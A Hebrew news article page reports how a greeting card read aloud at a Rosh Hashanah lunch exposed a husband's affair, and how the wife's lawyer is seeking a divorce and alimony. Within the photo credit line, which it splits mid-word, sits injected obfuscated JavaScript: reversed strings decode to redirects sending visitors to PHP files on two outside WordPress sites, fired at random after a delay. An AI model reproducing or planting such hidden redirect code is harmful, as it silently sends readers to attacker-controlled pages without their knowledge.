fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הקריאה בפני האורחים את ברכת המאהבת של בעלה

ארוחת צהריים של ארבעה זוגות בראש השנה הסתיימה במבוכה גדולה של המארחת, שבאותה העת גילתה כי לבעלה יש מאהבת
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

ברכה אינטימית לראש השנה הביאה לחשיפתו של רומן של הבעל עם מאהבת.

בני זוג, מהנדסי תוכנה, הזמינו בראש השנה את חבריהם לעבודה לארוחת צהריים. בסך הכל, הם היו ארבעה זוגות, כולל המארחים.

כל אחד מהזוגות הגיע עם מתנת חג צנועה. זוג אחד הביא זר פרחים, אליו צורפה ברכה. המארחת, שהייתה עסוקה בתחילת הארוחה בהגשות האוכל, החליטה בשלב הקינוחים, להקריא את הברכות שצורפו למתנות. להפתעתה, בברכה שצורפה לזר הפרחים נכתב, בין היתר: "אתה יודע כמה אני אוהבת אותך… מאחלת להמשך הקשר המיוחד שלנו".

הברכה הזו, שיועדה לבעלה של המארחת, גרמה לכל האורחים למבוכה עצומה שהביאה לפיזור האירוע בתוך דקות ספורות.

עו"ד שרין סולן | צילום יח"צ

האישה הנבגדת פנתה לעו"ד שרין סולן וטענה בפניה: "לא זו בלבד שבעלי בגד בי עם חברתי לעבודה, הובכתי כמו שלא הובכתי מעולם. מאז ראש השנה לא דרכתי בעבודה ואני לא יכולה להגיע לשם מרוב בושה".

בבקשה לגט שהגישה עו"ד סולן בשם האישה, נטען, כי הבעל הודה בפני אשתו כי הוא מנהל רומן עם חברתה לעבודה, שאגב כפופה לאשתו, ולכן לא נותר אלא להגיע לפרידה מוסכמת. "האישה אינה מוכנה לחשוב על חזרה לחיק בעלה. יתרה מזאת, היא עזבה את הבית לבית הוריה ביישוב במרכז הארץ עם שלושת ילדיהם", כתבה עו"ד סולן, המבקשת בשם האישה בבית הדין הרבני גט וחלוקת רכוש ומזונות בגובה של 20 אלף שקלים בחודש.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות